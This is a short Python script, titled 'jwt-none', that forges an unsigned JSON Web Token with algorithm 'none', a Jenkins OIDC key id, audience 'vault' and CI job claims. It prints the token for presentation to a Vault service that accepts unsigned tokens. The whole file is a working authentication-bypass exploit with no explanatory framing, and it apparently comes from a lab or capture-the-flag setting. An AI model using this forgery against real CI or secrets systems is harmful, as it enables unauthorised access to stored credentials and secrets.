jwt-none

#!/usr/bin/env python3
import json
import base64
from datetime import datetime, timedelta, UTC

def b64url_nopad(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')

now = datetime.now(UTC)

headers = {
    "alg": "none",
    "typ": "JWT",
    "kid": "jenkins-oidc-token"
}

payload = {
    "iss": "nulloidc",
    "aud": "vault",
    "exp": int((now + timedelta(minutes=30)).timestamp()),
    "iat": int(now.timestamp()),
    "job_name": "main-build",
    "sub": "${JOB_URL}",
    "build_number": 7
}

header_json = json.dumps(headers, separators=(',', ':'), ensure_ascii=False).encode('utf-8')
payload_json = json.dumps(payload, separators=(',', ':'), ensure_ascii=False).encode('utf-8')

header_b64 = b64url_nopad(header_json)
payload_b64 = b64url_nopad(payload_json)

token = f"{header_b64}.{payload_b64}."
print(token)